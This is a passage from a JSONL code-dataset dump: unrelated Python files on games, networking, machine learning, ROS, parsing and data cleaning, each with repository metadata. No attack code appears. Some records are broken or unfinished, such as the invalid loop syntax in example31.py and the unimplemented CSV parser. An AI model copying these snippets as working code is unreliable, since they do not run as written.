'v6' and v6type != '' and v6permit != '':\n aclobject.logname = logname\n aclobject.bfname = bfname\n aclobject.bfdate = bfdate\n aclobject.remark = remark\n aclobject.permittype = remarktype\n aclobject.permit = v6permit\n acllist.append(aclobject)","sub_path":"pyrob/loads/hfc/cfg/cmts_dm_cfg_bu_acl.py","file_name":"cmts_dm_cfg_bu_acl.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"209672946","text":"import random\n\nrock = '''\n _______\n---' ____)\n (_____)\n (_____)\n (____)\n---.__(___)\n'''\n\npaper = '''\n _______\n---' ____)____\n ______)\n _______)\n _______)\n---.__________)\n'''\n\nscissors = '''\n _______\n---' ____)____\n ______)\n __________)\n (____)\n---.__(___)\n'''\n\nimage = [rock, paper, scissors]\nchoice = int(input(\"What do you choose? 
0 for rock, 1 for paper, 2 for scissors.\\n\"))\nif choice < 3:\n print(image[choice])\nelse:\n print(\"Invalid input, you lose!\")\n# if choice == 0:\n# print(rock)\n# elif choice == 1:\n# print(paper)\n# elif choice == 2:\n# print(scissors)\n# else:\n# print(\"Invalid number, you lose!\")\n\nchoice_computer = random.randint(0,2)\n# if choice < 3:\n# print(\"Computer chose: \")\n# if choice_computer == 0:\n# print(rock)\n# elif choice_computer == 1:\n# print(paper)\n# else:\n# print(scissors)\n\nif choice < 3:\n print(image[choice_computer])\n if choice == choice_computer:\n print(\"It's a tie.\")\n elif (choice == 0 and choice_computer == 1) or (choice == 1 and choice_computer == 2) or (choice == 2 and choice_computer == 0):\n print(\"You lose!\")\n else:\n print(\"You win!\")\n","sub_path":"Day4-list/rock-paper-scissors-start.py","file_name":"rock-paper-scissors-start.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"3612752","text":"#!/usr/bin/env python\n\"\"\"\ndicts.py\n\nDictionaries\n============================================================ \nIn this section, write some functions which build and \nmanipulate python dictionaries.\n\"\"\"\n\ndef freq(data):\n frequency = dict()\n for x in range(0,len(data)):\n if data[x] not in frequency:\n frequency[data[x]] = 1\n else:\n frequency[data[x]] += 1\n return frequency\n\n\n\n\nmovies = {}\n\ndef score(title, value):\n if title not in movies:\n movies[title] = [value]\n else:\n movies[title].append(value)\n \n \n\n\ndef avg_score(title):\n \"return the average score for a given movie\"\n if title in movies:\n to_sum = movies[title][:]\n score = 0\n score = float(score)\n for x in range (0,len(to_sum)):\n score += to_sum[x]\n score = score/len(to_sum)\n return score\n \n\n\n# 3. parse_csv (Advanced)\n# Takes an input string and spits back a list of comma\n# separated values (csv) entries. Hint, check the zip\n# and dict functions.\n#\n# The point of this is to create your own parser, not to\n# use pythons builtin 'csv' library.\n#\n# >>> csv = \"\"\"\n# name,age,email\n# Foo, 24, foo@example.com\n# Bar ,22 ,bar@example.com\n# Baz, 20 , baz@gmail.com\n# \"\"\"\n# >>> parse_csv(csv)\n# [ { \"name\": \"Foo\", \"age\": \"24\", \"email\": \"foo@example.com\" },\n# { \"name\": \"Bar\", \"age\": \"22\", \"email\": \"bar@example.com\" },\n# { \"name\": \"Baz\", \"age\": \"20\", \"email\": \"baz@example.com\" } ] \n\ndef parse_csv(data):\n \"parses a csv file into a list of dictionaries\"\n\n","sub_path":"hw10/dicts.py","file_name":"dicts.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"2865542","text":"from socket import *\nimport os\nimport signal\n\n\"\"\"\n### 基于fork的多进程网络并发模型\n\n#### 实现步骤\n\n1. 创建监听套接字\n2. 等待接收客户端请求\n3. 客户端连接创建新的进程处理客户端请求\n4. 原进程继续等待其他客户端连接\n5. 
如果客户端退出,则销毁对应的进程\n\n\"\"\"\n\n# 全局变量\n\nHOST = \"0.0.0.0\"\nPORT = 11224\nADDR = (HOST, PORT)\n\n\n# 具体处理客户端请求\ndef handle(c):\n while True:\n data = c.recv(1024)\n if not data:\n break\n print(\"data recived:\", data.decode())\n c.send(b\"OK\")\n c.close()\n\n\n# 创建tcp 套接字\n\n\ns = socket()\ns.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\ns.bind(ADDR)\ns.listen(5)\n\n# 处理僵尸进程\nsignal.signal(signal.SIGCHLD, signal.SIG_IGN)\nprint(\"listen the port 8888...........\")\n\nwhile True:\n # 循环处理客户端连接\n c = None\n try:\n c, addr = s.accept()\n print(\"connect from\", addr)\n except KeyboardInterrupt:\n os._exit(0)\n except Exception as e:\n print(e)\n continue\n\n # 创建子进程处理客户端连接\n pid = os.fork()\n # 创建的套接字s 和 接受的套接字c 在子进程和父进程中都需要关闭\n # 子进程不需要自己创建的套接字s,提前关闭\n # 父进程不需要接受的套接字c,提前关闭\n\n if pid == 0:\n\n s.close()\n handle(c) # 处理具体事物\n os._exit(0) # 子进程销毁\n # 无论是pid < 0 还是 pid > 0 都要回去处理连接\n else:\n c.close() # 父进程不需要和客户端通信\n # 主线程只负责建立连接\n","sub_path":"part_02_system_programming/part_2_3_concur/day10/fork()_network_concurrency_model.py","file_name":"fork()_network_concurrency_model.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"46186938","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport pandas as pd\nimport numpy as np\n\ntrain_df = pd.read_csv(\"./data/train.csv\")\ncolors_list = train_df.color.unique()\ncolors_dict = {}\ncount = 0\nfor i in colors_list:\n colors_dict[i] = count\n count += 1\n\ntrain_df['color'] = train_df.color.apply(lambda x : colors_dict[x])\n\nnp.random.shuffle(train_df.values)\n\nmodel = keras.Sequential([\n keras.layers.Dense(32, input_shape = (2,), activation = 'relu'),\n keras.layers.Dense(32, activation = 'relu'),\n keras.layers.Dense(6, activation = 'sigmoid')])\n\nmodel.compile(optimizer = 'adam', loss = keras.losses.SparseCategoricalCrossentropy(from_logits=True), metrics=['accuracy'])\n\nx = np.column_stack((train_df.x.values, train_df.y.values))\nmodel.fit(x, train_df.color.values, batch_size= 4, epochs = 10)\n\n\ntest_df = pd.read_csv(\"./data/test.csv\")\ntest_df['color'] = test_df.color.apply(lambda x : colors_dict[x])\nnp.random.shuffle(test_df.values)\ntest_x = np.column_stack((test_df.x.values, test_df.y.values))\n\nmodel.evaluate(test_x, test_df.color.values)\n\nprint(model.predict(np.array([[0.7, 3]])))\n","sub_path":"clusters.py","file_name":"clusters.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"348904784","text":"#classPart002.py\n#GStrader\n#Fall 16\n\nimport pygame, sys\nfrom pygame.locals import *\n\npygame.init()\n\nclass SQUARE (object):\n\n def __init__(self, size, surface, position):\n\n self.size = size\n self.surf = surface\n self.pos = position\n\n\n self.SQRSURF = pygame.Surface((self.size , self.size) , flags=SRCALPHA, depth=32)\n self.SQRSURF.fill((100 , 200 , 100 , 150))\n\n\n def changepos(self,position):\n\n self.pos = position\n\n \n def display(self):\n\n self.surf.blit(self.SQRSURF, self.pos)\ndef main():\n\n DISPLAYSURF = pygame.display.set_mode((1200 , 900))\n DISPLAYSURF.fill((255 , 255 , 255,100))\n \n SQ1 = SQUARE(200 , DISPLAYSURF , (500 , 300))\n SQ2 = SQUARE(200 , DISPLAYSURF , (200 , 300))\n SQ2.pos = (0,0)\n SQ1.changepos((300 , 500))\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n SQ1.display()\n SQ2.display()\n pygame.display.update()\n \nif __name__ 
== \"__main__\": main()\n","sub_path":"Nooblet/Introduction to OOP/classPart002.py","file_name":"classPart002.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"270607297","text":"# WAP find sum and avg of 10 , 3-digit random numbers\r\n\r\nimport random\r\n\r\ndef get_3digit_rand_nums(size):\r\n rand_nums = []\r\n #for i in range(size):\r\n i = 0\r\n while i++ --\r\n return rand_nums\r\n\r\ndef get_sum_avg(list_seq):\r\n s = 0\r\n for e in list_seq:\r\n s = s+e\r\n return s, s/len(list_seq)\r\n\r\nr_nums = get_3digit_rand_nums(10)\r\ntotal, avg = get_sum_avg(r_nums) \r\nprint(\"Total : {} and Avg: {}\".format(total, avg))\r\n\r\n\r\n\r\noutput = get_sum_avg(r_nums)\r\nprint(output, type(output))\r\nprint(\"Total : {} and Avg: {}\".format(output[0], output[1]))\r\n\r\n\r\n\r\n","sub_path":"example31.py","file_name":"example31.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"129171926","text":"from App import app\nfrom flask import request,url_for,send_from_directory\nimport config\n\n# 跨域设置\n@app.after_request\ndef after_request(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n if request.method == 'OPTIONS':\n response.headers['Access-Control-Allow-Methods'] = 'DELETE, GET, POST, PUT'\n headers = request.headers.get('Access-Control-Request-Headers')\n if headers:\n response.headers['Access-Control-Allow-Headers'] = headers\n return response\n\n@app.route('/api/public/')\ndef getfile(filename):\n directory = config.PUBLIC_DIR # 假设在当前目录\n print(directory)\n return send_from_directory(directory, filename, as_attachment=True)\n\n\nfrom Controllers import AuthController,SpiderController","sub_path":"Controllers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"209034919","text":"class GameOfSegments:\n def winner(self, N):\n sg = [0] * 1001\n sg[2] = 1\n i = 3\n while i <= N:\n sg[i] = self.check(i, sg)\n i += 1\n\n if sg[N] == 0:\n return 2\n else:\n return 1\n\n def check(self, num, sg):\n sg_set = set()\n sg_set.add(sg[num-2])\n\n for i in xrange(1, num/2):\n tmp_sg = sg[i]^sg[num-2-i]\n sg_set.add(tmp_sg)\n\n i = 0\n while i in sg_set:\n i+=1\n return i\n","sub_path":"TopCoder/SRM624/SRM624_div2_3.py","file_name":"SRM624_div2_3.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"367229294","text":"from pico2d import *\n\n\nimport main_state\nimport game_framework\nfrom GameObject.Player import CPlayer\nimport CEffect\nname = 'Bullet'\n\n\nclass Bullet():\n image = [None,None,None,None]\n\n def __init__(self):\n pass\n def __init__(self, x, y,speed=720):\n self.x, self.y = x, y\n self.speed = speed\n self.isDead = False\n if Bullet.image[0] == None:\n Bullet.image[0] = load_image('../Resource/Bullet_Eg_a.png')\n if Bullet.image[1] == None:\n Bullet.image[1] = load_image('../Resource/Bullet_Eg_b.png')\n if Bullet.image[2] == None:\n Bullet.image[2] = load_image('../Resource/Bullet_Eg_c.png')\n if Bullet.image[3] == None:\n Bullet.image[3] = load_image('../Resource/Bullet_Eg_d.png')\n\n def update(self):\n self.y += self.speed * game_framework.frame_time\n if self.y > 960:\n return -1\n if self.isDead == True:\n return -1\n\n def draw(self):\n 
self.image[main_state.ListManager.Get_Player().Power].draw(self.x-5, self.y+10, 120, 120)\n\n\n\nclass Player_Lager():\n image = None\n\n def __init__(self):\n pass\n def __init__(self,x):\n self.DeltaX=x\n self.x, self.y=main_state.ListManager.Get_Player().x+self.DeltaX,main_state.ListManager.Get_Player().y\n self.isDead = False\n self.Frame=0\n self.LifeTime=0\n if Player_Lager.image== None:\n Player_Lager.image = load_image('../Resource/fire_lazer.png')\n\n def update(self):\n self.LifeTime+=1\n\n self.x =main_state.ListManager.Get_Player().x+self.DeltaX\n self.y =main_state.ListManager.Get_Player().y\n for n in main_state.ListManager.Monster_List:\n if n.x - n.RadianX < self.x < n.x+n.RadianX and self.y Set[str]:\n buffer = io.StringIO(self.blob.decode(\"utf-8\", errors=\"ignore\"))\n csv_reader = csv.reader(buffer)\n possible_urls = set()\n for row in csv_reader:\n for item in row:\n if \".\" in item and \"/\" in item:\n possible_urls.add(item)\n\n urls = URLList()\n for possible_url in possible_urls:\n urls += TextUrlFinder(possible_url).find_urls(strict=True)\n\n return set(urls)\n","sub_path":"urlfinderlib/finders/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"131622606","text":"#build the dictionary\n_Q = (('`1234567890-=', '~!@#$%^&*()_+'),\n ('qwertyuiop[]\\\\','QWERTYUIOP{}|'),\n ('asdfghjkl;\\'','ASDFGHJKL:\"'),\n ('zxcvbnm,./','ZXCVBNM<>?'))\n_D = (('`1234567890[]','~!@#$%^&*(){}'),\n ('\\',.pyfgcrl/=\\\\','\"<>PYFGCRL?+|'),\n ('aoeuihdtns-','AOEUIDHTNS_'),\n (';qjkxbmwvz',':QJKXBMWVZ'))\n\n_QToD = {}\n_DToQ = {}\nfor i in xrange(0, len(_Q)):\n for j in xrange(0, len(_Q[i][0])):\n _QToD[_Q[i][0][j]] = _D[i][0][j]\n _QToD[_Q[i][1][j]] = _D[i][1][j]\n _DToQ[_D[i][0][j]] = _Q[i][0][j]\n _DToQ[_D[i][1][j]] = _Q[i][1][j]\n\ndef QwertyToDvorak(text):\n return ''.join(map(lambda s: _QToD[s], text))\n\ndef DvorakToQwerty(text):\n return ''.join(map(lambda s: _DToQ[s], text))\n","sub_path":"abandoned/pyfun/keyboard.py","file_name":"keyboard.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"64795105","text":"import pickle\nimport sys\n\nglobal aut\n\ndef ReadFile(file_dir):\n try:\n curr_file = open(file_dir, \"r\", encoding=\"latin-1\")\n except:\n print(\"ERR: File not found!\")\n exit()\n lines = curr_file.read()\n chars = list()\n for line in lines:\n for char in line:\n chars.append(char)\n return chars\n\ndef EvalFile(chars):\n curr_state = \"A\"\n token_val = \"\"\n for i, symbol in enumerate(chars):\n\n\n if symbol in aut.ignore_set and i < len(chars)-1:\n continue\n\n if symbol in aut.trans_func[curr_state]:\n token_val += symbol\n curr_state = aut.trans_func[curr_state][symbol]\n continue\n\n\n if curr_state in aut.accepting_states:\n gen_state = aut.accepting_dict[curr_state]\n token = next(filter(lambda x: \"#-\" in x.value and x._id in gen_state, aut.nodes))\n token_type = token.value.split(\"#-\")[1]\n if token_type == \"ident\" and token_val in aut.keywords_value:\n keyword = next(filter(lambda x: x.value.value == token_val, aut.keywords))\n token_type = f\"KEYWORD: {keyword.value.value}\"\n if token_type == \"hexnumber\" and token_val in aut.keywords_value:\n keyword = next(filter(lambda x: x.value.value == token_val, aut.keywords))\n token_type = f\"KEYWORD: {keyword.value.value}\"\n else:\n token_type = \"None\"\n\n\n if token_val:\n 
print(f\"{repr(token_val)}\\t=>\\t{token_type}\")\n token_val = symbol\n\n if not symbol in aut.trans_func[\"A\"]:\n print(f\"{repr(token_val)}\\t=>\\tNone\")\n token_val = \"\"\n curr_state = \"A\"\n continue\n\n curr_state = aut.trans_func[\"A\"][symbol]\naut = pickle.load(open(\"./output/automata.p\", \"rb\"))\n\nfile_name = \"./input/test_input.txt\"\nif len(sys.argv) > 1: file_name = sys.argv[1]\nchars = ReadFile(file_name)\nEvalFile(chars)\n","sub_path":"scanner.py","file_name":"scanner.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"645216213","text":"#!/usr/bin/python3\nimport rospy\nfrom std_msgs.msg import Int16, String, Bool\nfrom mcgreen_control.msg import Array\nfrom luma.core.interface.serial import i2c, spi\nfrom luma.core.render import canvas\nfrom luma.oled.device import ssd1327\nfrom PIL import ImageFont, ImageDraw\nfrom time import sleep\nimport textwrap\n\nserial = spi(device=0, port=0)\ndevice = ssd1327(serial)\nfont_size = 12\nfont_name = \"FreeMono.ttf\"\nfont = ImageFont.truetype(font_name, font_size)\n\nclass OLED:\n\tMODE_TOPIC = \"/mode_status\"\n\tUP_DOWN_TOPIC = \"/up_down_status\"\n\tSAFETY_TOPIC = \"/safety_status\"\n\tFAILSAFE_TOPIC = \"/override_status\"\n\tGAME_TOPIC = \"/current_game\"\n\tEXPRESSION_TOPIC = \"/facial_expression\"\n\tUPPER_TOPIC = \"/upper_motors\"\n\tLOWER_TOPIC = \"/lower_motors\"\n\n\tdef __init__(self):\n\t\tself.mode_sub = rospy.Subscriber(self.MODE_TOPIC, Int16, self.mode_set)\n\t\tself.up_down_sub = rospy.Subscriber(self.UP_DOWN_TOPIC, Int16, self.up_down_set)\n\t\tself.game_sub = rospy.Subscriber(self.GAME_TOPIC, String, self.game_set)\n\t\tself.upper_sub = rospy.Subscriber(self.UPPER_TOPIC, Array, self.upper_set)\n\t\tself.lower_sub = rospy.Subscriber(self.LOWER_TOPIC, Array, self.lower_set)\n\t\tself.face_sub = rospy.Subscriber(self.EXPRESSION_TOPIC, Int16, self.face_set)\n\t\tself.safety_sub = rospy.Subscriber(self.SAFETY_TOPIC, Bool, self.safety_set)\n\t\tself.failsafe_sub = rospy.Subscriber(self.FAILSAFE_TOPIC, Int16, self.failsafe_set)\n\t\tself.mode = 1\n\t\tself.up_down = 1\n\t\tself.fs = 1\n\t\tself.game = \"None\"\n\t\tself.face = \"Neutral\"\n\t\tself.upper=[0] * 2 + [90] * 2\n\t\tself.lower=[1500] * 4\n\t\tself.safe = \"SAFE\"\n\t\tself.line = 0\n\t\tself.time = 0\n\n\tdef mode_set(self, data):\n\t\tself.mode = data.data\n\n\tdef up_down_set(self, data):\n\t\tself.up_down = data.data\n\n\tdef failsafe_set(self, data):\n\t\tself.fs = data.data\n\n\tdef safety_set(self, data):\n\t\tif data.data == True:\n\t\t\tself.safe = \"SAFE\"\n\t\telse:\n\t\t\tself.safe = \"WARNING\"\n\n\tdef upper_set(self, data):\n\t\tself.upper = data.arr\n\n\tdef lower_set(self, data):\n\t\tself.lower = data.arr\n\n\tdef game_set(self, data):\n\t\tself.game = str(data.data)\n\n\tdef face_set(self, data):\n\t\tself.face = data.data\n\t\tif self.face == 0:\n\t\t\tself.face = \"Warn\"\n\t\telif self.face == 1:\n\t\t\tself.face = \"Happy\"\n\t\telif self.face == 2:\n\t\t\tself.face = \"Neutral\"\n\t\telif self.face == 3:\n\t\t\tself.face = \"Sad\"\n\t\telif self.face == 4:\n\t\t\tself.face = \"Surprise\"\n\t\telif self.face == 5:\n\t\t\tself.face = \"Thumbs Up\"\n\n\n\tdef display(self):\n\t\tself.line = 0\n\t\twith canvas(device) as draw:\n\t\t\tself.write_text(\"M: \" + str(self.mode) + \" U/D: \" + str(self.up_down), draw)\n\t\t\tself.write_text(\"Game: \" + self.game, draw)\n\t\t\tself.write_text(\"Face: \" + str(self.face), 
draw)\n\n\t\t\tself.write_text(\"LA: \" + str(self.upper[:2]), draw)\n\t\t\tself.write_text(\"Servo: \" + str(self.upper[2:]), draw)\n\n\t\t\tself.write_text(\"D_Motors: \", draw)\n\t\t\tself.write_text(str(self.lower[1:3]), draw)\n\n\t\t\tself.write_text(\"Status: \" + self.safe, draw)\n\t\t\tself.write_text(\"Sensor Override: \" + str(self.fs), draw)\n\n\tdef write_text(self, text, draw): # if text is too long it returns the text with \\n\n\t\tw = font.getsize(text)[0]\n\t\th = font.getsize(text)[1]\n\t\tline_height = font.getsize(\"hg\")[1]\n\t\tlength = len(text)\n\t\tcurrent_size = 0\n\t\tbegin = 0\n\t\tnewlines = 0\n\t\tmodified_text = \"\"\n\t\tif w <= device.width:\n\t\t\tdraw.text((0, self.line), text, font=font, fill=\"white\")\n\t\t\th = font.getsize(text)[1]\n\t\t\tself.line += line_height\n\t\t\t#return 1\n\t\telse:\n\t\t\tfor i in range(length):\n\t\t\t\tcurrent_w = font.getsize(text[begin:i+1])[0]\n\t\t\t\tcurrent_h = font.getsize(text[begin:i+1])[1]\n\t\t\t\tif current_w > 128:\n\t\t\t\t\tdraw.text((0, self.line), text[begin:i], font=font, fill=\"white\")\n\t\t\t\t\th = font.getsize(text[begin:i])[1]\n\t\t\t\t\tself.line += line_height\n\t\t\t\t\tbegin = i\n\t\t\tdraw.text((0, self.line), text[begin:length+1], font=font, fill=\"white\")\n\t\t\th = font.getsize(text[begin:length+1])[1]\n\t\t\tself.line += line_height\n\nif __name__ == \"__main__\":\n\trospy.init_node(\"OLED_Screen_Controller\")\n\targs = {\"rate\": rospy.get_param(\"~rate\")}\n\tscreen = OLED()\n\tr = rospy.Rate(args[\"rate\"])\n\twhile not rospy.is_shutdown():\n\t\tscreen.display()\n\t\tr.sleep()\n","sub_path":"src/RPi/lower_pi/oled_screen_controller.py","file_name":"oled_screen_controller.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"192449018","text":"import re\n\nfrom calendar import monthrange\nfrom dateutil.parser import parse as guess_date\n\nimport jinja2\n\n\n# jinja2 filters\ndef subtract_minutes(time_hms, minute_subtrahend):\n \"\"\"\"\n jinja2 filter that subtracts given minutes from time in HH:MM:SS format\n \"\"\"\n (h, m, s) = map(int, time_hms.split(':'))\n seconds = h * 3600 + m * 60 + s - minute_subtrahend * 60\n\n h, s = divmod(seconds, 3600)\n m, s = divmod(s, 60)\n\n return \"%02d:%02d:%02d\" % (h, m, s)\n\n\ndef render(some_date, ledger, template):\n year_month = guess_date(some_date).strftime('%Y-%m')\n start_date = re.sub(r'(\\d{4})-(\\d{2}).*', r'\\1-\\2-01', year_month)\n last_day_of_month = monthrange(*map(int, year_month.split('-')[:2]))[1]\n end_date = re.sub(r'(\\d{4})-(\\d{2}).*', r'\\1-\\2-{}', year_month) \\\n .format(last_day_of_month)\n\n try:\n template_env = jinja2.Environment(loader=jinja2.PackageLoader('bundyclock', 'templates'))\n template_env.filters['lunch'] = subtract_minutes\n template = template_env.get_template(template)\n except jinja2.exceptions.TemplateNotFound:\n template_env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath=\"./\"))\n template_env.filters['lunch'] = subtract_minutes\n template = template_env.get_template(template)\n\n context = dict(\n month=end_date,\n total_month=ledger.get_total_report(start_date, end_date),\n workdays=ledger.get_month(year_month)\n )\n rendered_report = template.render(context)\n\n return rendered_report\n","sub_path":"bundyclock/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} 
+{"seq_id":"214633322","text":"from pytest import mark, raises, fixture\n\nfrom evaluator import evaluate, define_function, UserFunction\nimport errors\n\n\ndef test_evaluate_number():\n got = evaluate({}, 7)\n assert 7 == got\n\n\n@mark.parametrize(\"ast, value\", [\n (['+', 1, 2], 3),\n (['*', 6, ['+', 3, 4]], 42),\n (['/', ['*', ['-', 100, 32], 5], 9], 37)\n])\ndef test_expression(ast, value):\n got = evaluate({}, ast)\n assert value == got\n\n\ndef test_evaluate_undefined_variable():\n ast = 'x'\n with raises(errors.UndefinedVariable) as excinfo:\n evaluate({}, ast)\n assert \"Undefined variable: 'x'.\" == str(excinfo.value)\n\n\ndef test_set_global():\n # backup global_environment\n import evaluator\n initial_globals = evaluator.global_environment\n evaluator.global_environment = {}\n # test\n ast = ['set', 'test_set_var', ['/', 6, 2]]\n want_name = 'test_set_var'\n want_value = 3\n empty_env = {}\n got = evaluate(empty_env, ast)\n assert want_value == got\n assert len(empty_env) == 0\n assert want_name in evaluator.global_environment\n assert want_value == evaluator.global_environment[want_name]\n # restore global_environment\n evaluator.global_environment = initial_globals\n\n\n@mark.parametrize(\"ast ,want\", [\n (['if', 1, 2, 3], 2),\n (['if', 0, 2, 3], 3),\n # (if (> 1 0) 2 (/ 3 0))\n (['if', ['>', 1, 0], 2, ['/', 3, 0]], 2),\n])\ndef test_evaluate_if(ast, want):\n got = evaluate({}, ast)\n assert want == got\n\n\ndef test_print(capsys):\n ast = ['print', 7]\n got = evaluate({}, ast)\n assert 7 == got\n captured = capsys.readouterr()\n assert '7\\n' == captured.out\n\n\ndef test_begin(capsys):\n ast = ['begin',\n ['print', 1],\n ['print', 2],\n ['print', 3]\n ]\n got = evaluate({}, ast)\n assert 3 == got\n captured = capsys.readouterr()\n assert '1\\n2\\n3\\n' == captured.out\n\n\ndef test_while_false(capsys):\n ast = ['while', 0, ['print', 9]]\n got = evaluate({}, ast)\n assert 0 == got\n captured = capsys.readouterr()\n assert len(captured.out) == 0\n\n\ndef test_while(capsys):\n # backup global_environment\n import evaluator\n initial_globals = evaluator.global_environment\n evaluator.global_environment = {}\n # test\n ast = ['begin',\n ['set', 'x', 3],\n ['while', 'x',\n ['begin',\n ['print', 'x'],\n ['set', 'x', ['-', 'x', 1]]\n ]]]\n got = evaluate({}, ast)\n assert 0 == got\n captured = capsys.readouterr()\n assert '3\\n2\\n1\\n' == captured.out\n # restore global_environment\n evaluator.global_environment = initial_globals\n\n\ndef test_define_function():\n # backup function_definitions\n import evaluator\n initial_fundefs = evaluator.function_definitions\n evaluator.function_definitions = {}\n # test\n parts = ['double', ['n'], ['*', 'n', 2]]\n want_name = 'double'\n want_formals = ['n']\n want_body = ['*', 'n', 2]\n got = define_function(parts)\n assert '' == got\n new_func = evaluator.function_definitions[want_name]\n assert want_name == new_func.name\n assert want_formals == new_func.formals\n assert want_body == new_func.body\n # restore function_definitions\n evaluator.function_definitions = initial_fundefs\n\n\n@fixture\ndef mod_body():\n return ['-', 'm', ['*', 'n', ['/', 'm', 'n']]]\n\n\ndef test_user_function_repr(mod_body):\n func = UserFunction('mod', ['m', 'n'], mod_body)\n assert '' == repr(func)\n\n\ndef test_user_function_call(mod_body):\n func = UserFunction('mod', ['m', 'n'], mod_body)\n got = func(17, 5)\n assert 2 == got\n\n\ndef test_evaluate_undefined_function():\n ast = ['spam', 99]\n with raises(errors.UndefinedFunction) as excinfo:\n evaluate({}, 
ast)\n assert \"Undefined function: 'spam'.\" == str(excinfo.value)\n\n\ndef test_apply_user_function():\n # backup function_definitions\n import evaluator\n initial_fundefs = evaluator.function_definitions\n evaluator.function_definitions = {}\n # test\n parts = 'triple', ['n'], ['*', 'n', 3]\n define_function(parts)\n ast = ['triple', 7]\n assert 21 == evaluate({}, ast)\n # restore function_definitions\n evaluator.function_definitions = initial_fundefs\n","sub_path":"plain/SubPascalHappyPaths/evaluator_test.py","file_name":"evaluator_test.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"417354905","text":"from sklearn import datasets \nfrom scipy.constants.constants import alpha\n\ndiabetes = datasets.load_diabetes()\nX_train = diabetes.data[:-20]\ny_train = diabetes.target[:-20]\n\nX_test = diabetes.data[-20:]\ny_test = diabetes.target[-20:]\n\nfrom sklearn import linear_model\nlinear_regr = linear_model.LinearRegression()\nlinear_regr.fit(X_train, y_train)\n\nprint(linear_regr.predict(X_test))\nprint(y_test)\n\n#shrinkage \nimport numpy as np\nX = np.c_[0.5, 1.0].T\nprint(X)\ny = np.c_[0.5, 1].T\nprint(y)\ntest = np.c_[0, 2].T\nprint(test)\n\nlinear_regr = linear_model.LinearRegression()\n\n#import pylab as pl\nimport matplotlib.pyplot as plt\n#pl.figure()\n\nnp.random.seed(0)\nfor _ in range(6):\n this_X = 0.1*np.random.normal(size=(2,1)) + X\n linear_regr.fit(this_X, y)\n plt.plot(test, linear_regr.predict(test))\n plt.scatter(this_X, y, s=3)\nplt.show()\n \n#Ridge Regression\nlinear_regr = linear_model.Ridge(alpha=0.1)\nnp.random.seed(0)\nfor _ in range(6):\n this_X = 0.1*np.random.normal(size=(2,1)) + X\n linear_regr.fit(this_X, y)\n plt.plot(test, linear_regr.predict(test))\n plt.scatter(this_X, y, s=3)\nplt.show() \n\n#Lasso\nlinear_regr = linear_model.Lasso()\nalphas = [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]\nscores = [linear_regr.set_params(alpha=alpha).fit(X_train, y_train).score(X_test, y_test) for alpha in alphas]\nbest_alpha = alphas[scores.index(max(scores))]\nalpha = best_alpha \nlinear_regr.fit(X_train, y_train)\nprint(linear_regr.coef_)\n\n\n\n\n\n\n\n\n\n\n\n \n \n ","sub_path":"Tutorial-'SupervisedLearning/linearRegr.py","file_name":"linearRegr.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"107350731","text":"import pandas as pd \n#read file\ndata = pd.read_csv(\"cityhall.csv\")\n#print(data.head)\n#select column 1\ndt = data.iloc[:,0]\n#print(dt)\n#split column \ndt = dt.str.split(' ', expand=True)\n#print(dt)\n\n#change data type\ndt.iloc[:,0] = dt.iloc[:,0].astype('datetime64[ns]')\ndt.iloc[:,1] = dt.iloc[:,1].astype('datetime64[ns]')\n\n#print(dt.iloc[:,0].dt.year)\ndf = pd.concat([dt.iloc[:,0].dt.year,\n dt.iloc[:,0].dt.month,\n dt.iloc[:,0].dt.dayofweek,\n dt.iloc[:,1].dt.hour]\n , axis = 1)\n\ndata = pd.concat([data, df], axis = 1)\nprint(data.head)\n\n\n#drop out\ndata = data.drop(['DateTime_Measured'], axis=1)\ndata.columns = ['Total_Demand_KW', 'year', 'month', 'dayofweek', 'hour']\n\n#save\ndata.to_csv('cityhall_clean.csv', 